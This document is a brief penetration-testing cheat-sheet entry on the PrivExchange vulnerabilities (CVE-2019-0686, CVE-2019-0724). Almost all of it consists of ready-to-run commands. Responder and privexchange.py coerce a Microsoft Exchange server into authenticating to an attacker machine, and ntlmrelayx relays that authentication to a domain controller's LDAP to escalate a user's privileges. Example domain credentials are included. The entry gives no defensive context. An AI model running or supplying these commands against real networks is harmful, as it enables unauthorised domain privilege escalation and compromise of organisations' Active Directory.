PrivExchange

CVE-2019-0686, CVE-2019-0724

Check:

$ sudo ./Responder.py -I eth0 -Av
$ python privexchange.py -d MEGACORP -u snovvcrash -p 'Passw0rd!' -ah 10.10.13.37 --attacker-page '/test/test/test' exch01.megacorp.local --debug

Exploit:

$ ntlmrelayx.py -t ldap://DC01.megacorp.local --escalate-user snovvcrash --no-smb-server --no-wcf-server --no-raw-server --no-dump --no-da --no-acl --no-validate-privs
$ python privexchange.py -d MEGACORP -u snovvcrash -p 'Passw0rd!' -ah 10.10.13.37 exch01.megacorp.local --debug

Last updated